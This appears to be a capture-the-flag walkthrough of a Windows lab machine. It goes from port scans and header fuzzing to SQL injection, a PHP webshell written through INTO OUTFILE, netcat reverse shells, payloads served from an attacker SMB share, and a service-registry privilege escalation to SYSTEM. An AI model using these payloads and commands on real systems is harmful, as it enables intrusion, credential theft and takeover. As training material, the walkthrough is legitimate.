As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.93 scan initiated Mon Mar 27 11:11:02 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.167
Nmap scan report for 10.10.10.167
Host is up (0.059s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
3306/tcp open mysql
49666/tcp open unknown
49667/tcp open unknown
# Nmap done at Mon Mar 27 11:11:28 2023 -- 1 IP address (1 host up) scanned in 26.63 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.93 scan initiated Mon Mar 27 11:12:08 2023 as: nmap -sCV -p80,135,3306,49666,49667 -Pn -oN targeted 10.10.10.167
Nmap scan report for 10.10.10.167
Host is up (0.099s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql?
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 27 11:13:08 2023 -- 1 IP address (1 host up) scanned in 60.63 seconds
The website shows a landing page with four buttons.
There is a comment in the source code of the main page with an IP address.
The Admin button will redirect to admin.php, which is asking for a missing header.
Exploitation
We could try to bruteforce the header. Let's use wfuzz and set each available header in the wordlist to the IP address we found in the source code.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.167/admin.php
Total requests: 1185
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000145: 400 6 L 34 W 374 Ch "Content-Length"
000000732: 501 6 L 26 W 343 Ch "Transfer-Encoding"
000000923: 200 153 L 466 W 7933 Ch "X-Forwarded-For"
Total time: 0
Processed Requests: 1185
Filtered Requests: 1182
Requests/sec.: 0
The X-Forwarded-For header returns a 200 status code. Let's use BurpSuite as a proxy, and inject this header into every request we make from our browser. Configure it from Proxy > Proxy settings > Match and replace rules.
Now we have access to the admin page.
If we try to find a product with a ' character, an SQL error will appear. Which means that probably the site is vulnerable to SQL Injections.
First, we need to know the number of columns of the current table. As we can see, it has 6 columns, because it doesn't show any errors.
p' order by 6-- -
Now, we could try to list the available databases.
p' union select schema_name,2,3,4,5,6 from information_schema.schemata-- -
There is one database mysql, which usually has two columns called user and password. Let's retrieve the data of those columns.
p' union select user,password,3,4,5,6 from mysql.user-- -
We get password hashes for users root, manager and hector. We can try to break those with rainbow tables.
These credentials might be useful in the future. Let's try to get a shell in the system. Something we could do is check as what user we are running queries in the database.
p' union select user(),2,3,4,5,6-- -
It is the manager user. Which happens to have the FILE privilege, so we can create files in the system.
p' union select grantee,privilege_type,is_grantable,4,5,6 from information_schema.user_privileges-- -
As the web server is using IIS 10.0, the website should be located in C:\intepub\wwwroot\. Create a PHP webshell in that directory.
p' union select "<?php system($_GET[\'cmd\']);?>",2,3,4,5,6 into outfile "c:\inetpub\wwwroot\rce.php"-- -
Now, set a netcat listener on port 4444.
nc -lvnp 4444
-llisten mode.
-vverbose mode.
-p specify the port to listen on.
-nnumeric-only IP, no DNS resolution.
And a SMB server where the nc.exe binary is located.
impacket-smbserver smbFolder $(pwd) -smb2support
Finally, send a reverse shell to our netcat listener, and get a shell as nt authority\iusr.
Listening on 0.0.0.0 4444
Connection received on 10.10.10.167 49698
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\wwwroot>whoami
whoami
nt authority\iusr
Privilege Escalation
As seen, there is a local user called Hector.
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
Hector WDAGUtilityAccount
The command completed with one or more errors.
Which is a member of the Remote Management Users group. We could try to run commands as this user creating PSCredentials and using Invoke-Command with the credentials that got earlier.
Listening on 0.0.0.0 5555
Connection received on 10.10.10.167 49706
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\Hector\Documents>whoami
whoami
control\hector
C:\Users\Hector\Documents>type \users\hector\desktop\user.txt
type \users\hector\desktop\user.txt
9943350f7b824c5464aad64a2e5400f6
If the PowerShell history file there are a few interesting commands.
type \Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
As seen above, hector hash full access over the services. To verify it, let's run WinPEAS.exe. Copy it where the SMB server is located, and run it from the victim machine.
\\10.10.14.11\smbFolder\winPEASany.exe
...
īŋŊīŋŊīŋŊīŋŊīŋŊīŋŊīŋŊīŋŊīŋŊīŋŊÍš Looking if you can modify any service registry
...
HKLM\system\currentcontrolset\services\seclogon (Hector [FullControl])
...
There are a few services that we can modify. But there is one called seclogon, which when executed, runs with administrator privileges.
All we have to do is start the service to get a shell as nt authority\system. Then, all we have to do is reap the harvest and take the root flag.
sc start seclogon
Listening on 0.0.0.0 6666
Connection received on 10.10.10.167 49721
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
c31ba53ef095b0b4f380a162099c6eba
